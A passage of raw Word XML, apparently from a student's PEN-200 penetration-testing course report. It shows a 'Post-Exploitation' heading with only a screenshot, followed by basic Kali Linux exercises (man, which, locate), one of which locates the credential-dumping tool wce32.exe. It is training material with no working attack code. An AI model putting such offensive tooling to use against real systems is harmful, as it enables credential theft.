                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/local/bin:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/bin:/bin:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/local/games:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/games"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="326831DD" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="1C75E830" w14:textId="573833B4" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C8C3BC"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>beta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08D6A476" w14:textId="5E015776" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15"/>
    <w:p w14:paraId="748533E3" w14:textId="77777777" w:rsidR="00854D15" w:rsidRPr="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15"/>
    <w:p w14:paraId="34086EDE" w14:textId="4A9BDDE6" w:rsidR="00AE353F" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc92471636"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="37281853" w14:textId="77777777" w:rsidR="00BB52B8" w:rsidRDefault="00BB52B8" w:rsidP="00417905">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5ECAC6" w14:textId="5344C1AC" w:rsidR="00BB52B8" w:rsidRPr="00854D15" w:rsidRDefault="186B290E" w:rsidP="00854D15">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B3B62F2" wp14:editId="7C5EE337">
            <wp:extent cx="5943094" cy="20567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943094" cy="2056765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14EBF2" w14:textId="311ED7E9" w:rsidR="00BB52B8" w:rsidRDefault="00BB52B8" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="074DD3E0" w14:textId="4FC5DDC3" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="74D9742D" w14:textId="0EE70383" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="4F7E6A6B" w14:textId="3D86BB79" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="74D2DD75" w14:textId="5886BCCD" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="4405E282" w14:textId="77777777" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="7C24AD4D" w14:textId="77777777" w:rsidR="00D14E89" w:rsidRPr="00BB52B8" w:rsidRDefault="00D14E89" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="4D69CD62" w14:textId="15387CF3" w:rsidR="00260A0B" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc92471637"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3. Exercises</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5D0EA0B7" w14:textId="77777777" w:rsidR="00BB52B8" w:rsidRPr="00BB52B8" w:rsidRDefault="00BB52B8" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="3D76D0B3" w14:textId="77777777" w:rsidR="00A72D23" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc92471638"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. General Course Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="29C5F0B9" w14:textId="09D2D658" w:rsidR="00A72D23" w:rsidRDefault="00A72D23" w:rsidP="00ED4831">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Reporting is </w:t>
      </w:r>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>not required</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> for the exercises</w:t>
      </w:r>
      <w:r w:rsidR="006801DE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> below, they are for </w:t>
      </w:r>
      <w:r w:rsidR="00BD54EE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>demonstration</w:t>
      </w:r>
      <w:r w:rsidR="006801DE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> purposes only. For more </w:t>
      </w:r>
      <w:r w:rsidR="00BD54EE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="006801DE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> regarding the reporting requirements, please visit the following link </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="006801DE" w:rsidRPr="00E56127">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://help.offensive-security.com/hc/en-us/articles/360046787731-PEN-200-Reporting-Requirements</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006801DE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B54E9E5" w14:textId="7A8850D3" w:rsidR="00A72D23" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc92471639"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Getting Comfortable with Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="73BCDFC4" w14:textId="3E8BC513" w:rsidR="00A72D23" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc92471640"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.3.6 - Kali Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="28ACD3D7" w14:textId="13143FB3" w:rsidR="0060389E" w:rsidRPr="0060389E" w:rsidRDefault="0060389E" w:rsidP="0060389E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3386583C" wp14:editId="2AB1D6D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3798336</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>165588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1701829" cy="904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1701829" cy="904875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A10E7" w14:textId="6D1316E1" w:rsidR="00A72D23" w:rsidRDefault="00A72D23" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> the ka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>li user password to something se</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>cure.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Take some time to fa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">miliarize yourself with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>menu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72D23">
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACC5A7" w14:textId="53114A96" w:rsidR="00A72D23" w:rsidRDefault="00A72D23" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B287E8" w14:textId="07ED0C83" w:rsidR="00A72D23" w:rsidRDefault="003B0095" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. F</w:t>
      </w:r>
      <w:r w:rsidRPr="003B0095">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>ind your favorite tool and review its documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CD9EB" w14:textId="77777777" w:rsidR="00A72D23" w:rsidRDefault="00A72D23" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A82688" w14:textId="77777777" w:rsidR="00A72D23" w:rsidRDefault="00A72D23" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606D44B9" w14:textId="7429471F" w:rsidR="00A72D23" w:rsidRDefault="186B290E" w:rsidP="003B03B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc92471641"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.4.3.4 - Finding Files in Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="004436E0">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A44A19" w14:textId="4479150C" w:rsidR="004E5B78" w:rsidRDefault="003B03B0" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AAC0AF9" wp14:editId="13D6E133">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3144129</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2362232" cy="6767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2362232" cy="676702"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004E5B78">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="004E5B78" w:rsidRPr="004E5B78">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidR="004E5B78" w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r w:rsidR="004E5B78" w:rsidRPr="004E5B78">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> look at the man page for one</w:t>
      </w:r>
      <w:r w:rsidR="004E5B78" w:rsidRPr="004E5B78">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">of your preferred </w:t>
      </w:r>
      <w:r w:rsidR="004E5B78" w:rsidRPr="004E5B78">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>commands.</w:t>
      </w:r>
      <w:r w:rsidR="004E5B78" w:rsidRPr="004E5B78">
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0060389E">
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0CD28" w14:textId="7CD83DCB" w:rsidR="004E5B78" w:rsidRDefault="00BA1474" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E4845AC" wp14:editId="17233D33">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3152775</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2344420" cy="680085"/>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4420" cy="680085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0060389E">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003B03B0">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="003B03B0" w:rsidRPr="003B03B0">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidR="003B03B0" w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r w:rsidR="003B03B0" w:rsidRPr="003B03B0">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> to look for a keyword related to</w:t>
      </w:r>
      <w:r w:rsidR="003B03B0">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003B03B0" w:rsidRPr="003B03B0">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> file compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE632E7" w14:textId="5F1B9EB1" w:rsidR="003B03B0" w:rsidRDefault="00FA67B7" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64AD5E13" wp14:editId="114E0478">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3151163</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2333625" cy="655799"/>
            <wp:effectExtent l="0" t="0" r="317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2333625" cy="655799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> to locate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> command on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>your Kali virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B93D752" w14:textId="30388E10" w:rsidR="003B03B0" w:rsidRDefault="003B03B0" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FBA7B1" w14:textId="617C0C3A" w:rsidR="004E5B78" w:rsidRDefault="0060389E" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05CD01E8" wp14:editId="0928E71B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3153290</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>119624</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2354135" cy="4991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2354135" cy="499110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00FA67B7" w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidR="00FA67B7" w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>locate</w:t>
      </w:r>
      <w:r w:rsidR="00FA67B7" w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> to locate </w:t>
      </w:r>
      <w:r w:rsidR="00FA67B7" w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>wce32.exe</w:t>
      </w:r>
      <w:r w:rsidR="00FA67B7" w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> on your </w:t>
      </w:r>
